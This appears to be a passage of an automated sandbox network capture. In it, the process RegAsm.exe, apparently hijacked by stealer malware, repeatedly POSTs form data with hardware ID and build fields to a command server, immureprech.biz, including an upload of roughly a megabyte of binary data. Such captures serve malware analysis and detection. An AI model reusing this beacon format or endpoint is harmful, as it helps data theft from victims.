                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SyAvn0F0%2FxKg3PJrlWrmu86jgNO87MjkjhdxwBrXKBMXRGcPOMFZUNpEp0If%2BPLPpHckNNmgwG2BCmmycR0Li8fpkfy0HfLRBEHXAHDx7YCBIk8uEWhbwaPErB3gMH823gg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1e95ebb04587-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=113985&min_rtt=113826&rtt_var=24252&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21440&delivery_rate=33510&cwnd=252&unsent_bytes=0&cid=9bb8681d7ae26055&ts=609&x=0"
                                                    2024-12-12 16:34:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a
                                                    Data Ascii: 11ok 89.187.171.165
                                                    2024-12-12 16:34:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.11.2049714172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:02 UTC275OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=C3LWZ7G84HI7
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 10903
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:02 UTC10903OUTData Raw: 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 43 33 4c 57 5a 37 47 38 34 48 49 37 0d
                                                    Data Ascii: --C3LWZ7G84HI7Content-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--C3LWZ7G84HI7Content-Disposition: form-data; name="pid"2--C3LWZ7G84HI7Content-Disposition: form-data; name="lid"DUkgLv--EBALAY--C3LWZ7G84HI7
                                                    2024-12-12 16:34:02 UTC1018INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=ivsg9p0q0qlkd576n4k33kqrhg; expires=Mon, 07-Apr-2025 10:20:41 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQuDGiXDgy%2BxFAgx4sG1djHBADuSUkLpb29tUFZfOrNETAtsuaOokbosUvpE79ZchTiCCQ8%2BTGJHOHEOrre36zN8TOSnMVjll%2Fhwd2MGQUVkKLGprdwrg7jraAnSxffKvkE%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1e9b3bb7ed8c-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=113884&min_rtt=113851&rtt_var=24068&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2838&recv_bytes=11836&delivery_rate=33614&cwnd=252&unsent_bytes=0&cid=0a7d227e3ea3176c&ts=905&x=0"
                                                    2024-12-12 16:34:02 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a
                                                    Data Ascii: 11ok 89.187.171.165
                                                    2024-12-12 16:34:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.11.2049715172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:03 UTC273OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=UADEEVLT2A
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 20520
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:03 UTC15331OUTData Raw: 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 55 41 44 45 45 56 4c 54 32 41 0d 0a 43 6f 6e 74 65 6e 74
                                                    Data Ascii: --UADEEVLT2AContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--UADEEVLT2AContent-Disposition: form-data; name="pid"3--UADEEVLT2AContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--UADEEVLT2AContent
                                                    2024-12-12 16:34:03 UTC5189OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc a6 e8 30 bd ee bb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: \ot^:):Ln`X6Eusazw0
                                                    2024-12-12 16:34:03 UTC1019INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=svf0trpi7elchsbfns0ambpdo6; expires=Mon, 07-Apr-2025 10:20:42 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9lDYun3iDipyVKsOphICyNiSocf5nbSIdJIGQsZyt1ASnZ%2BWTNISj6qMsAHO73elxLF3eoo8tMTBN1P18ZC7AAgnIcO03yCmKI%2BIBinqZcJTFXfZfOaIg4MrPHrw87g%2FS1A%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1ea2ba3abce6-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=114099&min_rtt=114028&rtt_var=24164&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21473&delivery_rate=33527&cwnd=251&unsent_bytes=0&cid=0f5fe9049caaf1e2&ts=669&x=0"
                                                    2024-12-12 16:34:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a
                                                    Data Ascii: 11ok 89.187.171.165
                                                    2024-12-12 16:34:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.11.2049716172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:04 UTC276OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=2L142YZ0IX4WKD
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1256
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:04 UTC1256OUTData Raw: 2d 2d 32 4c 31 34 32 59 5a 30 49 58 34 57 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 32 4c 31 34 32 59 5a 30 49 58 34 57 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4c 31 34 32 59 5a 30 49 58 34 57 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 32 4c 31 34 32 59 5a
                                                    Data Ascii: --2L142YZ0IX4WKDContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--2L142YZ0IX4WKDContent-Disposition: form-data; name="pid"1--2L142YZ0IX4WKDContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--2L142YZ
                                                    2024-12-12 16:34:04 UTC1020INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=8eilbk0fe3iukfivjf5lcs5rdr; expires=Mon, 07-Apr-2025 10:20:43 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5x5Awmi1LyJB2C9LkRufOrBC5NygL1w0E5%2FQuUBIfEk2a27CddywkVVueOHgluCF%2BdrAazrblAHtlP%2BbbAM63lYd4MwEDNpUAj3r0kY05nTXfS3eFC4i%2F%2FF14xl8tgNWqA%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1ea90f703be7-MEM
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=123631&min_rtt=123328&rtt_var=26271&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2168&delivery_rate=31029&cwnd=252&unsent_bytes=0&cid=a6f8f17244477c45&ts=627&x=0"
                                                    2024-12-12 16:34:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0d 0a
                                                    Data Ascii: 11ok 89.187.171.165
                                                    2024-12-12 16:34:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.11.2049717172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:05 UTC281OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=QOGKQY9Z8PPSYK8T
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1047224
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 2d 2d 51 4f 47 4b 51 59 39 5a 38 50 50 53 59 4b 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 51 4f 47 4b 51 59 39 5a 38 50 50 53 59 4b 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 4f 47 4b 51 59 39 5a 38 50 50 53 59 4b 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 0d 0a 2d 2d 51
                                                    Data Ascii: --QOGKQY9Z8PPSYK8TContent-Disposition: form-data; name="hwid"ABE4A45DB129FD4CDB71E32F12885CB3--QOGKQY9Z8PPSYK8TContent-Disposition: form-data; name="pid"1--QOGKQY9Z8PPSYK8TContent-Disposition: form-data; name="lid"DUkgLv--EBALAY--Q
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: b8 c2 b4 4a 71 11 ba 7a fd a5 e2 a6 68 70 f1 a9 61 32 b5 0f a4 72 60 6d bd e2 57 86 ee 75 cb 6a 10 f5 24 43 38 e1 19 02 9f 9e 52 17 e1 b1 f4 c5 f0 be 09 84 31 b4 7b 74 48 a0 80 8a b3 1a 7b 0d c1 98 76 ea c8 1e b1 45 15 b9 41 52 7b 14 b7 e1 8a 6d e8 ed c6 84 ed 84 77 01 c3 4d e1 a2 61 be e1 52 8b a2 36 79 23 b7 1e ec f0 a1 71 92 2e 9b 17 b0 6d 5f ee 94 68 3e 9d 98 94 df b4 83 03 5c 2a 03 c1 22 c6 d7 7c 6f 5d f8 e6 a6 f6 76 e7 e7 e6 eb 92 f2 f8 16 b5 35 8d fc 3f 80 0a b5 ad 1b eb 5f 20 87 9c 32 d1 fc 3e 28 5e b2 5b 8a b7 02 25 14 9c 95 6a 40 e0 ad 2e 59 60 97 ee 1c 85 f6 00 bc db 99 7f 00 5b 7d 0b 8d 39 7b a0 e4 0d 19 11 20 a1 04 4e 4d c8 02 d8 be 4d 00 2f 83 76 08 d8 4a 81 e2 29 ce 2d bf 9a 90 c1 97 80 ec e1 d9 2c f4 5f 00 ef 65 96 a8 f0 d6 35 b4 b0 b9 c0
                                                    Data Ascii: Jqzhpa2r`mWuj$C8R1{tH{vEAR{mwMaR6y#q.m_h>\*"|o]v5?_ 2>(^[%j@.Y`[}9{ NMM/vJ)-,_e5
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: e1 2b 42 cc 8f 03 88 1f 30 e6 e8 a2 93 20 c8 f8 bd 48 f3 47 ae ca be f4 b2 75 cb c9 56 fe 0e 11 a7 db 6d 3f 55 6b a5 cc e2 fa ee 51 f2 7d a3 7a 2d 0f 56 d6 86 ce 6b 69 bf d0 e1 9a df 90 58 3c 56 9f f6 82 93 d6 83 52 fd 30 b8 8f cb 74 48 73 cf dc 4e d2 3c 96 61 71 9f 20 a8 db 2a 64 6b 14 5e cf 6b d6 34 1e 46 b5 f6 5c 78 eb a5 c3 81 2c 0f 8d 65 c5 4d 90 96 45 12 ee e1 e0 bc 05 8d 41 fd 0b e9 97 86 9b c2 c5 6c e5 f5 9e 87 02 5b b6 56 09 cd 48 20 7e c9 c8 a9 02 4c 9d 63 f5 6f 9d 37 f2 5e da ed 1c f3 85 01 bb 56 87 2c df f5 40 18 7d 16 78 04 97 d5 62 fb af af 92 d5 5a 2a 14 2f 59 a1 d6 24 2a c0 dc e3 42 c6 10 c6 a2 65 f6 3e 76 75 a3 24 9b 2e 20 df 7d ba 00 b9 11 4e a5 6c 77 31 c1 8c 1b fe b5 20 b6 b4 ed 1a 98 41 77 ff db 62 75 5d b5 74 6c 37 f4 f5 e5 b8 f8 d0
                                                    Data Ascii: +B0 HGuVm?UkQ}z-VkiX<VR0tHsN<aq *dk^k4F\x,eMEAl[VH ~Lco7^V,@}xbZ*/Y$*Be>vu$. }Nlw1 Awbu]tl7
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 3f 17 83 e2 86 37 78 b7 bb da 35 70 6d 44 66 f7 f1 19 15 7f af 7d 06 be a2 0f 24 7e 12 1f 64 1d 35 33 6e 0d 29 49 22 50 ae 96 10 2c 4a 03 6b 02 c0 d7 67 60 3d 4c af b8 7e 80 bd cb 0d de f1 d6 dd da 66 a4 a3 15 13 be bf a2 65 12 9b 36 06 57 d2 8d 12 2a 4a b5 82 1b c3 b6 a6 dc c8 c7 2d 17 37 89 44 45 80 f2 fd 94 91 da 73 20 f2 e9 a6 3c b0 65 35 69 41 e6 23 88 79 8e 00 7d 18 82 0f 2e 10 c7 27 38 02 6c 75 4b 3c c0 4e 50 a5 e3 d0 10 3c ab b1 be 3e a8 69 ee fe ca 47 64 14 8d 17 6c 67 19 16 3b 13 46 37 89 ef 09 b6 08 db 62 ef b2 d9 6a 4d b3 77 d2 33 e3 78 61 1d c1 91 ed b0 e9 2b 05 b8 11 5e 20 6d fb 1b 6f 7a 36 f6 ad fc 4e 04 c0 13 0f 56 01 d8 00 7e 8c 14 fc b7 38 d4 4e 6a 5c 28 39 a5 cd f1 f3 5e 4b d6 e4 ca e0 6a bc f9 e4 ad e5 89 e9 97 61 f1 35 92 c2 1e 17 6d
                                                    Data Ascii: ?7x5pmDf}$~d53n)I"P,Jkg`=L~fe6W*J-7DEs <e5iA#y}.'8luK<NP<>iGdlg;F7bjMw3xa+^ moz6NV~8Nj\(9^Kja5m
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 11 bb f1 ec 11 fb e5 f8 f9 47 0e 64 a3 8a 04 b4 b9 ff 0c ef 50 cc f9 eb 5c 49 bf cb a2 21 6f 43 1d 05 85 d1 43 0b 08 a4 ce 05 a6 61 4f 51 01 76 47 b7 0b 15 4f 56 8f fc 64 5f ff 3e de 69 b3 d3 e3 ba 22 09 c0 0f ef 5b b0 6b d3 8b 53 d7 83 b2 54 2d df 10 4e 5c 0d de b5 ef f0 62 bc 4b c2 1d 1e 8f 55 e8 f0 70 e7 61 0e 93 15 d2 cb 46 4c 98 e7 3b d9 49 3d ae c0 f8 8d 9d 37 0b 65 d8 18 57 31 ae 5a 68 97 b4 af 45 00 3e 7d de 03 44 c6 0f 1a 80 3d 82 fe 76 68 ca 34 a5 75 d5 39 a7 dc 6e c7 fb f4 98 cd 6c 8e 65 57 f7 1f 7b 56 5b 85 13 05 4a 96 aa 5c ce 1f 29 95 0f 43 78 e9 7f f2 78 1f 79 7d 4a 12 97 dc 2c e4 58 36 95 5c a3 c5 dc 2a ac ed 78 a7 2b e1 94 a0 6b 53 1e 78 c6 cf 44 a6 9b d2 e5 39 b7 0f 0e eb e0 e5 29 85 c7 d6 4a ef 3c d1 64 99 59 0f 51 b8 8c 43 08 7e b1 e4
                                                    Data Ascii: GdP\I!oCCaOQvGOVd_>i"[kST-N\bKUpaFL;I=7eW1ZhE>}D=vh4u9nleW{V[J\)Cxxy}J,X6\*x+kSxD9)J<dYQC~
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 75 76 a7 2a 7d af 5d ac fd e2 4a e6 37 be a0 57 53 43 b9 f3 0e 85 f4 dd 58 b0 f1 4d 20 98 4e 68 d8 36 cf dd a2 1b 1f df fb dc f2 d6 ba 68 93 78 f5 0c 35 f3 99 d5 70 d7 5e ff 7f 26 98 47 a2 34 4b fd c8 d7 89 b4 44 e4 65 d9 2b f2 50 ee 73 c7 35 3d 49 91 09 1e 45 d0 ee ae b7 3d 17 d9 09 b5 be 8d e7 36 f5 db 6c 2c 1c b6 6b 1d 37 70 e3 c6 6c 51 af 04 fc 4f d3 f6 ef 61 45 ff ce c7 81 1c 02 18 b2 91 64 bc 15 19 de 9b 21 c8 1c a4 67 ab 86 3d 99 c7 e5 2c ae da ba d9 68 6c 17 9c de ab b9 aa e4 01 19 b5 02 b2 02 58 e0 d0 56 9e e9 62 5e d5 7d af 7f c0 23 5d 5e ab f1 72 4b f6 84 09 25 78 2f 74 d7 8a 0a 7a 29 a4 9c 77 5b 85 ef 0a 30 d1 ba 61 81 05 b8 de dd 38 1b c4 74 90 74 1c a1 52 93 80 33 b2 c9 f8 7c bc 5e 94 1a ee 87 39 c7 54 3e c4 56 cd 80 2c 98 7e 8f 93 e3 f5 54
                                                    Data Ascii: uv*}]J7WSCXM Nh6hx5p^&G4KDe+Ps5=IE=6l,k7plQOaEd!g=,hlXVb^}#]^rK%x/tz)w[0a8ttR3|^9T>V,~T
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 41 86 72 10 ea 21 60 e4 87 26 d9 c8 4f eb 99 44 24 2d 74 fa 7b 36 54 48 2f 2a 12 0e ec 8b c3 16 89 d0 cc a2 9e fc f4 bd 6e 71 d7 0e d0 96 15 3d 58 a2 0c 40 12 14 66 97 82 da 2b 80 d0 f1 9d cc 1d 4a 7d 22 a1 a1 dd 2c e4 5d f4 5d f6 05 9b 10 cb f5 7b 32 60 0d c0 eb 0f 02 85 78 97 8a 47 66 d1 cc 12 04 37 2e da 40 62 c3 f9 f3 00 7c fb 74 51 3f c3 0a 39 38 54 14 f6 fd f8 50 37 85 99 1f 79 f1 28 92 b4 2a 91 f8 28 91 48 20 ed ef ed 01 dd c2 19 2e 0f 36 67 b2 18 b5 33 0b 9c aa 4e 46 ad 5f 4e df 5c 66 9e c9 54 ee aa 45 33 86 69 7e e7 ea dc 8e b4 ef 5e 48 04 0f 1c fc 24 7a 20 fc d8 ae 12 90 2a a7 28 6e a1 07 56 66 84 b4 7c 3b 94 e6 3f 6b ba bf 17 fc f5 39 be 36 4c c4 d8 e6 c7 24 3c 28 57 32 7e 11 24 fa dd fe 4d 8e c6 4a ef 63 e7 68 bc 46 68 cf c7 b7 a8 8e b9 ed f0
                                                    Data Ascii: Ar!`&OD$-t{6TH/*nq=X@f+J}",]]{2`xGf7.@b|tQ?98TP7y(*(H .6g3NF_N\fTE3i~^H$z *(nVf|;?k96L$<(W2~$MJchFh
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 23 3b b5 50 da f2 96 2d e9 a8 0b cb fd a2 0d 2c 8a 1d 01 d0 81 b6 35 b1 a3 cb a8 93 af 43 eb 1f 60 83 75 24 62 5e 2c 8d 9b 89 8e 18 b6 1f 1b a9 23 54 8d 32 23 04 5f 76 29 e2 b3 ba b6 6e 64 15 d9 c8 32 71 ff 76 58 d1 05 31 0c 2c 69 bf 8f ba be b0 b9 22 ca a6 97 f8 c4 c4 43 9b c6 cc 07 a1 1e ed 65 0f f0 a2 db 60 bc c2 c8 2e e2 ef cc f4 8a 87 2a 1b 86 8c 83 e2 57 0e ae c9 50 2a e6 77 a1 e2 c2 ab 9c 6c 34 59 46 66 44 b2 53 13 88 3e 6f 1e 25 09 b3 36 f8 b8 02 5f 8f 7d 06 83 13 9c 34 86 f7 a6 28 a2 be 18 70 26 18 9a b2 b5 e1 00 f6 98 a8 9b 98 3e d9 99 ad 17 da 5b 9f f8 07 c6 1e 68 7c a6 88 b6 09 87 f8 fc 28 30 19 57 8d c9 e8 25 28 58 e1 81 ca 01 ae 64 54 b8 04 47 94 e7 69 96 82 c6 64 3d 75 c5 bd 7f 7c 93 d1 9f 91 9a ef fc b6 73 68 16 25 c2 6a 83 06 6e 1b 04 b3
                                                    Data Ascii: #;P-,5C`u$b^,#T2#_v)nd2qvX1,i"Ce`.*WP*wl4YFfDS>o%6_}4(p&>[h|(0W%(XdTGid=u|sh%jn
                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 11 88 d4 bf eb e5 e6 64 04 4c b8 7b 5b 01 0d 32 e0 9c f8 3e 71 7a a9 35 99 00 a2 4e 70 c0 b4 f0 7b 19 21 25 95 02 0d 6a 99 a1 c7 21 ef 13 ac 08 48 0e 26 6c f5 a0 54 96 be 64 fc 8c 82 0a c0 1b 21 10 1b 6b 4c 96 fb d3 93 d6 d3 ac 53 00 92 1c 9f 2e ae 4b ad ff a4 16 f7 b5 16 5a 71 58 7a 8d 17 b7 f5 6e e6 66 5c 44 b8 e8 28 bd 02 9a a8 12 a6 f1 b9 2c 83 70 54 e8 d9 5b 26 b6 b6 27 c6 3c 09 1d 5a 22 e5 1b 31 bf f6 cb 64 18 6b 0e e5 37 7d 7a 21 53 5f 88 ba 89 c7 fd bc b8 89 75 53 08 86 dd ea 3f 60 f2 1a da 0a be 81 e3 de 86 6f 5a 1d be 16 cd 1d b6 62 ad 3a b5 98 05 35 ee 25 70 0b 04 1a 88 f0 18 fe 19 78 be 43 bf 50 2c 9f b0 ac df 6b 1f 3b 9f 63 cf 86 8f 53 ea 13 f3 34 64 61 31 41 e6 e9 9a 35 57 3b 8f 32 42 7c 41 55 0f 86 b6 24 51 06 30 3b 61 e6 fb ac 5a 1c 65 4d
                                                    Data Ascii: dL{[2>qz5Np{!%j!H&lTd!kLS.KZqXznf\D(,pT[&'<Z"1dk7}z!S_uS?`oZb:5%pxCP,k;cS4da1A5W;2B|AU$Q0;aZeM
